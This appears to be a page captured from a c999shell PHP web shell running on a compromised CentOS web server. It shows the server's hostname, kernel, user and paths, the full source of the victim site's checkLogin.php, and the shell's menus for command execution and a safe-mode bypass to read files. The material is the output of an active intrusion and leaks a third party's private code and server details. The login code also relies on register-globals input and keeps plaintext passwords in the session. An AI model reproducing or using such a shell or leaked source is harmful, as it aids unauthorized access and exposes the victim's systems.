Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/mistk_joice2222/ums/ drwxr-xr-x |
Viewing file: checkLogin.php (2.87 KB) -rw-r--r-- Select action/file-type: (+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) | include_once("global.php"); include_once("../class/clsConnection.php"); include_once("../class/clsDB.php"); include("clsUmUser.php"); include_once("clsUser.php"); include_once("clsUmUserGroup.php"); include_once("clsUmGPermission.php"); include_once("clsUmPermission.php"); session_start(); if (! session_is_registered ("oU")) { session_register("oU"); $oU = new clsUser(); } session_regenerate_id(); $SID=session_id(); $oCx = new clsConnection($GLOBALS['HOST'], $GLOBALS['DB'], $GLOBALS['USER'], $GLOBALS['PASSWORD']); $oUs = new umuser($oCx); $oUg = new umusergroup($oCx); $oGp = new umgpermission($oCx); $oUp = new umpermission($oCx); $oUs->SearchByLogin($login, $password); if ($oUs->GetRecord()) { if ($oUs->UsAdmin==1){ $oU->userID=$oUs->UsID; $oU->userLogin=$oUs->UsLogin; $oU->userName=$oUs->UsName; $oU->userPassword=$oUs->UsPassword; $oU->userDptCode=$oUs->dptID; $oU->userDptName=$oUs->dptName; $oU->userPosCode=$oUs->posID; $oU->userPosName=$oUs->posName; $oU->active=$oUs->UsActive; $oU->WgID=$oUs->UsWgID; $oU->userIP=getenv("REMOTE_ADDR"); $oUs->SetSessionID($oUs->UsID, session_id()); $oU->sessionID = session_id(); //================================== //=get group permission and user permission //get group permission of user $oUg->RSgroupByUs($oU->userID); while ($oUg->GetRecord()){ //get group menu permission $oGp->RSMnByGpID($oUg->UgGpID); while($oGp->GetRecord()){ //create array of menu permission by group $oU->aGp[$oUg->UgGpID.$oGp->gpMnID]=array($oGp->gpX,$oGp->gpC,$oGp->gpR,$oGp->gpU,$oGp->gpD); } } //get user permission $oUp->RSMnByUs($oU->userID); while($oUp->GetRecord()){ //create array of menu permission by user $oU->aUp[$oU->userID.$oUp->pmMnID]=array($oUp->pmX,$oUp->pmC,$oUp->pmR,$oUp->pmU,$oUp->pmD); } //================================== echo ""; }else{ echo "
ย้อนกลับ "; } exit(); } else{ $oU->userID=""; $oU->userLogin=""; $oU->userPassword=""; $oU->userIP=""; $oU->userName=""; $oU->userDptCode=""; $oU->userDptName=""; $oU->userPosCode=""; $oU->userPosName=""; $oU->userPsCode="-1"; $oU->sessionID=""; $oU->Lang = "th"; $oU->WgID=""; $oU->StID=""; $oU->GpI=""; $oU->MnID=""; $oU->X=""; $oU->C=""; $oU->R=""; $oU->U=""; $oU->D=""; echo ""; exit(); } ?> bool(false) |
:: Command execute :: | |
:: Shadow's tricks :D :: | |
Useful Commands
|
:: Preddy's tricks :D :: | |
Php Safe-Mode Bypass (Read Files)
|
--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0055 ]-- |